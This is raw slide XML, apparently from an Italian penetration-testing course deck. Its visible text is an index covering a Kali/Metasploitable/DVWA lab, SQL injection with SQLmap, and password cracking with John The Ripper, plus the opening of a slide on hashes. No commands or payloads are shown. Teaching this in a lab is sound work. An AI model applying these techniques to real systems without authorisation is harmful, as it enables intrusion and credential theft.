                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="-9621" r="-1375" b="-192"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 14" id="14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="2177515" y="6867364"/>
            <a:ext cx="15081785" cy="2724311"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2724311" w="15081785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15081785" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15081785" y="2724311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2724311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 15" id="15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-1658605" y="-2670964"/>
            <a:ext cx="6259084" cy="5993073"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5993073" w="6259084">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6259083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6259083" y="5993073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5993073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>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094816" y="788593"/>
            <a:ext cx="5052107" cy="999646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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="4294297"/>
            <a:ext cx="15381560" cy="2254251"/>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4.0 - Cracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Password</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999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5868" y="-635766"/>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94065" y="44628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9954" y="763155"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="15751273" y="-1086697"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3796150" y="463704"/>
            <a:ext cx="13253600" cy="8942154"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3490660" cy="2355135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3490660" cy="2355135"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2355135" w="3490660">
                  <a:moveTo>
                    <a:pt x="14603" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3476057" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3479930" y="0"/>
                    <a:pt x="3483644" y="1539"/>
                    <a:pt x="3486383" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3489122" y="7016"/>
                    <a:pt x="3490660" y="10730"/>
                    <a:pt x="3490660" y="14603"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3490660" y="2340532"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3490660" y="2348597"/>
                    <a:pt x="3484122" y="2355135"/>
                    <a:pt x="3476057" y="2355135"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14603" y="2355135"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6538" y="2355135"/>
                    <a:pt x="0" y="2348597"/>
                    <a:pt x="0" y="2340532"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="14603"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10730"/>
                    <a:pt x="1539" y="7016"/>
                    <a:pt x="4277" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7016" y="1539"/>
                    <a:pt x="10730" y="0"/>
                    <a:pt x="14603" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="3490660" cy="2402760"/>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3908993" y="5077050"/>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2051378" y="3236663"/>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0" r="0" b="-139600"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8057145" y="3916501"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8057145" y="6635288"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6995332" y="1229156"/>
            <a:ext cx="6855237" cy="7981539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>1 - LABORATORIO VIRTUALE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    1.1 - Configurazione Macchina Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    1.2 - Configurazione Macchina Metasploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    1.3 - Configurazione DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    1.4 - Verifica Comunicazione Macchine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>2 - CONFIGURAZIONE DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>3 - SQL/SQL INJECTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.1 - Definizione del Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.2 - Panoramica SQL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.3 - Panoramica SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.4 - Verifica delle Vulnerabilità</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.5 - Studio del Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.6 - SQLi in azione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.6.1 - SQLmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>4 - CRACKING PASSWORD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>4.1 - Definizione di Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    4.2 - Studio dell’Hash e identificazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    4.3 - John The Ripper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    4.4 - MD5 Encrypt &amp; Decrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    4.5 - Verifica credenziali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2641"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12476196" y="4691551"/>
            <a:ext cx="4094226" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4114800" w="4094226">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4094226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40942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1" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12476196" y="677430"/>
            <a:ext cx="5511612" cy="738072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6043"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4317">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11993002" y="1210106"/>
            <a:ext cx="5511612" cy="440891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3523"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2517">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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3589434" y="-3281655"/>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770036" y="7864623"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="5132666" y="1642892"/>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937106" y="3546376"/>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708008" y="833145"/>
            <a:ext cx="6420598" cy="8637576"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="14160500" cy="19050000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="1248918" y="3146933"/>
              <a:ext cx="10725785" cy="12979655"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="12979655" w="10725785">
                  <a:moveTo>
                    <a:pt x="8757412" y="12979655"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1968373" y="12979655"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="881253" y="12979655"/>
                    <a:pt x="0" y="12098402"/>
                    <a:pt x="0" y="11011282"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1968373"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="881253"/>
                    <a:pt x="881253" y="0"/>
                    <a:pt x="1968373" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8757412" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9844532" y="0"/>
                    <a:pt x="10725785" y="881253"/>
                    <a:pt x="10725785" y="1968373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10725785" y="11011407"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10725658" y="12098402"/>
                    <a:pt x="9844405" y="12979655"/>
                    <a:pt x="8757412" y="12979655"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect l="-978" t="-21927" r="-42006" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="14160500" cy="19050000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="19050000" w="14160500">
                  <a:moveTo>
                    <a:pt x="14160500" y="19050000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19050000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14160500" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14160500" y="19050000"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect l="-28" t="0" r="-28" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 9" id="9"/>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0" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15654127" y="-536682"/>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1" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1759925"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4.1 - DEFINIZIONE DI HASH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 12" id="12"/>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11969650" y="9539288"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 14" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8102891" y="1467445"/>
            <a:ext cx="9526115" cy="7790855"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2902729" cy="2373973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 15" id="15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2902729" cy="2373973"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2373973" w="2902729">
                  <a:moveTo>
                    <a:pt x="20318" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2882411" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2893632" y="0"/>
                    <a:pt x="2902729" y="9097"/>
                    <a:pt x="2902729" y="20318"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2902729" y="2353655"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2902729" y="2364876"/>
                    <a:pt x="2893632" y="2373973"/>
                    <a:pt x="2882411" y="2373973"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20318" y="2373973"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9097" y="2373973"/>
                    <a:pt x="0" y="2364876"/>
                    <a:pt x="0" y="2353655"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="20318"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="9097"/>
                    <a:pt x="9097" y="0"/>
                    <a:pt x="20318" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 16" id="16"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="2902729" cy="2421598"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3079"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8468175" y="1676224"/>
            <a:ext cx="8984688" cy="7794498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3122"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2230">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Cos’è un Hash?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
